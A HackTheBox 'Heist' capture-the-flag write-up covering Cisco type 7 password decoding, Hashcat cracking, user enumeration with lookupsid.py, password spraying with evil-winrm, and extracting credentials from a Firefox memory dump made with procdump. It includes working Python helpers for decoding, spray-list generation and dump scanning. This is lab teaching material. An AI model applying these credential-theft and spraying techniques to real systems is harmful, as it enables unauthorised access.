Heist (HackTheBox)

Ibrahim Ekim Isik
3 min read · Jul 11, 2021

Heist is an easy-rated HackTheBox Windows machine. The way in is password cracking plus username enumeration, and privilege escalation is the very common pattern of dumping credentials out of a running Firefox process. I would recommend this box to everyone.

NMAP

As always, I run Nmap first to see which ports and services are exposed on the target. The -p- switch (all 65535 TCP ports) takes longer than the default top-1000 scan, but it is always worth including so that a service on an unusual port is not missed. Note that -A already turns on -sC and -sV, so those two switches are redundant in the command below, though harmless.

nmap -sC -sV -A -p- <targetip>

Website Enumeration

On port 80 we have a website that asks for credentials. We do not have any yet, so the first step is to use the "login as guest" option and look at what the attachment there contains.

The attachment contains three passwords in a format I had not seen before. After some research I identified them as Cisco IOS password strings (Cisco stores these in several formats, some merely obfuscated and some properly hashed). I recover them and make a note of the results.

For the last password I have to use Hashcat to crack it. The question now is: who owns this password?
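The distinction that matters for the three strings above is which Cisco format each one is in: "type 7" is a fixed-key XOR obfuscation that any decoder reverses instantly, while type 5, 8 and 9 are real hashes that need Hashcat. The script below is an added example, not code from the original post: it triages password-bearing lines from a Cisco config, decodes the type 7 ones locally and reports the Hashcat mode for the hashed ones. The config lines in it are constructed samples (the $1$ value is a placeholder, not a real hash), not the contents of the Heist attachment.

```python
# Added example (not from the original post): triage Cisco IOS password
# strings pulled from a config, decode the reversible "type 7" ones locally,
# and point the hashed ones at the right Hashcat mode. The config lines
# below are constructed samples, not the contents of the Heist attachment.
import re

# Fixed XOR key of Cisco's type 7 obfuscation; it has been public for decades.
_T7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# (regex, Cisco type, Hashcat mode or None when no cracking is needed)
_PATTERNS = [
    (re.compile(r"(?:password|secret)\s+7\s+([0-9A-Fa-f]+)\b"), 7, None),
    (re.compile(r"(?:password|secret)\s+5\s+(\$1\$\S+)"), 5, 500),    # md5crypt
    (re.compile(r"(?:password|secret)\s+8\s+(\$8\$\S+)"), 8, 9200),   # PBKDF2-SHA256
    (re.compile(r"(?:password|secret)\s+9\s+(\$9\$\S+)"), 9, 9300),   # scrypt
    (re.compile(r"(?:password|secret)\s+0\s+(\S+)"), 0, None),        # plaintext
]


def decode_type7(enc: str) -> str:
    """Reverse a type 7 string: two decimal digits give the key offset, the
    rest is hex of each plaintext byte XORed with the key at offset+i."""
    if len(enc) < 4 or len(enc) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", enc):
        raise ValueError("not a type 7 string: %r" % enc)
    seed = int(enc[:2], 10)
    if seed >= len(_T7_KEY):
        raise ValueError("type 7 seed out of range: %d" % seed)
    data = bytes.fromhex(enc[2:])
    plain = bytes(b ^ _T7_KEY[(seed + i) % len(_T7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


def encode_type7(plain: str, seed: int = 2) -> str:
    """Inverse of decode_type7, used here to round-trip test the decoder."""
    data = plain.encode("ascii")
    enc = bytes(b ^ _T7_KEY[(seed + i) % len(_T7_KEY)] for i, b in enumerate(data))
    return "%02d%s" % (seed, enc.hex().upper())


def triage(config: str) -> list:
    """Walk a config dump and return one dict per password-bearing line."""
    found = []
    for line in config.splitlines():
        user = re.match(r"\s*username\s+(\S+)", line)
        for rx, ptype, mode in _PATTERNS:
            m = rx.search(line)
            if not m:
                continue
            value = m.group(1)
            entry = {"user": user.group(1) if user else None, "type": ptype,
                     "value": value, "hashcat_mode": mode, "plaintext": None}
            if ptype == 7:
                entry["plaintext"] = decode_type7(value)
            elif ptype == 0:
                entry["plaintext"] = value
            found.append(entry)
            break
    return found


# Constructed sample; the $1$ value is a placeholder, not a real hash.
SAMPLE_CONFIG = """\
enable secret 5 $1$salt$xxxxxxxxxxxxxxxxxxxxxx
username admin password 7 02050D480809
username ops password 0 Plain-Text-Pw
"""

if __name__ == "__main__":
    for e in triage(SAMPLE_CONFIG):
        print(e)
```

The type 7 sample decodes to "cisco", the classic reference value for that format. For a type 5 line the script only tells you the Hashcat mode (-m 500, md5crypt); the cracking itself is the Hashcat run the post describes.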

I go back to the "login as guest" page and notice a username there: Hazard.

I now have what looks like a password for Hazard, but there is no SSH service running on the target. Evil-WinRM is one of the best tools for Windows machines that expose WinRM instead of SSH. I tried to log in as Hazard with evil-winrm, but it did not work, and I did not know why at the time. Worth remembering: a WinRM login needs the account to be allowed remote management (a member of Administrators or Remote Management Users) on top of a correct password, so a credential that fails over WinRM may still be valid and usable for SMB/RPC enumeration. At this point I got stuck for a bit, then started looking for other users, since I still have two more passwords to try.

User Enumeration/AD

"lookupsid.py", from Impacket, enumerates accounts by cycling through RIDs over MSRPC and resolving each SID to a name, so it finds usernames rather than guessing them. It needs a valid credential to bind with, and I have one for Hazard.

I then try the two remaining passwords against the enumerated users, and one of them works!
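The two steps above (enumerate users with lookupsid.py, then try the leftover passwords against them) are mechanical enough to script. The following is an added example, not code from the original post: it parses lookupsid.py's output into a user list, skipping groups and aliases, and builds the (user, password) pairs to try with evil-winrm. The output block is constructed in lookupsid.py's format; the host name TARGET, the IP, the RIDs and every user other than Hazard are hypothetical, and the passwords are placeholders.

```python
# Added example (not from the original post): parse lookupsid.py output into
# a user list and turn the leftover cracked passwords into a spray list for
# evil-winrm. The output below is constructed in lookupsid.py's format; the
# host name, IP, RIDs and every user other than Hazard are hypothetical.
import re

# Constructed sample of what `lookupsid.py 'hazard:<pw>@<ip>'` prints.
SAMPLE_LOOKUPSID = """\
[*] Brute forcing SIDs at 10.0.0.5
[*] StringBinding ncacn_np:10.0.0.5[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-1111111111-2222222222-3333333333
500: TARGET\\Administrator (SidTypeUser)
501: TARGET\\Guest (SidTypeUser)
513: TARGET\\None (SidTypeGroup)
1008: TARGET\\Hazard (SidTypeUser)
1012: TARGET\\helpdesk (SidTypeUser)
"""

# "<rid>: <host>\<name> (<SidType>)"
_LINE = re.compile(r"^(\d+):\s+(?:[^\\\s]+)\\(\S+)\s+\((SidType\w+)\)\s*$")


def parse_lookupsid(text: str) -> list:
    """Return (rid, name) for every SidTypeUser line; groups/aliases are skipped."""
    users = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m and m.group(3) == "SidTypeUser":
            users.append((int(m.group(1)), m.group(2)))
    return users


def spray_candidates(users, passwords, known=None, skip_builtin=("Guest",)):
    """Pair every remaining password with every user whose password is not
    already known. Guest is skipped by default: it is disabled on a default
    Windows install."""
    known = known or {}
    pairs = []
    for _rid, name in users:
        if name in known or name in skip_builtin:
            continue
        for pw in passwords:
            pairs.append((name, pw))
    return pairs


def evil_winrm_cmds(host: str, pairs) -> list:
    """Render one evil-winrm invocation per candidate (-i host, -u user, -p password)."""
    return ["evil-winrm -i %s -u %s -p '%s'" % (host, u, p) for u, p in pairs]


if __name__ == "__main__":
    users = parse_lookupsid(SAMPLE_LOOKUPSID)
    # The two passwords the attachment leaves unassigned (placeholder values).
    pairs = spray_candidates(users, ["password-two", "password-three"],
                             known={"Hazard": "password-one"})
    print("\n".join(evil_winrm_cmds("10.0.0.5", pairs)))
```

Keep the spray small and deliberate: each pair is one logon attempt, and a few users times a few passwords is fine, but a large list against a domain with a lockout policy will lock accounts.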

Privilege Escalation

I may be the worst person at Windows privilege escalation, but the first thing I always do is run "ps" (an alias of Get-Process in PowerShell) to list the running processes. I saw Firefox, which is worth a look: a browser the user has logged into something with keeps submitted form data and session material in its process memory, so dumping it can yield credentials.

I use procdump.exe from Sysinternals to dump the Firefox process memory (with its -ma switch, so that a full memory dump rather than a minidump is written). After the ".dmp" file is written I transfer it to my machine and inspect it.

The "strings filename | grep pass" command is a quick way to pull candidate credentials out of the dump. Two caveats: use grep -i so that "Password" and "PASSWORD" match too, and run strings a second time with -el (16-bit little-endian), because many strings in a Windows process are stored as UTF-16 and the default ASCII scan does not see them.
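To make the procdump-then-strings step above concrete, here is an added example (not code from the original post) that does what "strings dump | grep -i pass" does, but scans for both ASCII and UTF-16LE runs so the Windows-style strings are not missed. The dump bytes are a constructed stand-in for a Firefox .dmp (a minidump magic, an ASCII form body, a UTF-16LE string and filler), not data from the Heist machine, and the credentials in them are made up.

```python
# Added example (not from the original post): a strings-style scan of a
# process dump that finds both ASCII and UTF-16LE text and filters it the
# way `strings dump | grep -i pass` does. The dump bytes are a constructed
# stand-in for a Firefox .dmp, not data from the Heist machine.
import re


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Return (offset, encoding, text) for every printable run of >= min_len
    characters, in ASCII and in UTF-16LE (what `strings` and `strings -el`
    would each report), ordered by offset."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16le_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    hits = []
    for m in ascii_run.finditer(blob):
        hits.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in utf16le_run.finditer(blob):
        hits.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(hits)


def grep_creds(blob: bytes, needle: str = "pass") -> list:
    """Case-insensitive filter over extract_strings(), like `grep -i`."""
    needle = needle.lower()
    return [h for h in extract_strings(blob) if needle in h[2].lower()]


# Constructed sample dump: the "MDMP" minidump magic, an ASCII HTTP form body
# as a browser would hold it, a UTF-16LE string as Windows stores most text,
# and unrelated filler. The credentials are made up.
SAMPLE_DUMP = (
    b"MDMP" + b"\x00" * 6
    + b"login_password=Hunter2&user=bob"
    + b"\x00\x00\xff\xfe"
    + "password=W1nterTime".encode("utf-16-le")
    + b"\x00\x00"
    + b"nothing to see"
    + b"\x00"
)

if __name__ == "__main__":
    for off, enc, text in grep_creds(SAMPLE_DUMP):
        print("0x%08x %-8s %s" % (off, enc, text))
```

On the sample, plain "strings | grep pass" would only surface the ASCII form body; the UTF-16LE hit is the one that needs "strings -el". Once you have a hit, the offset lets you open the dump in a hex viewer and read the surrounding bytes, which is where the matching username usually sits.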

Ibrahim Ekim Isik

Purple Team — eJPT & eCPTTv2 & Security+ , CEH , Splunk Core User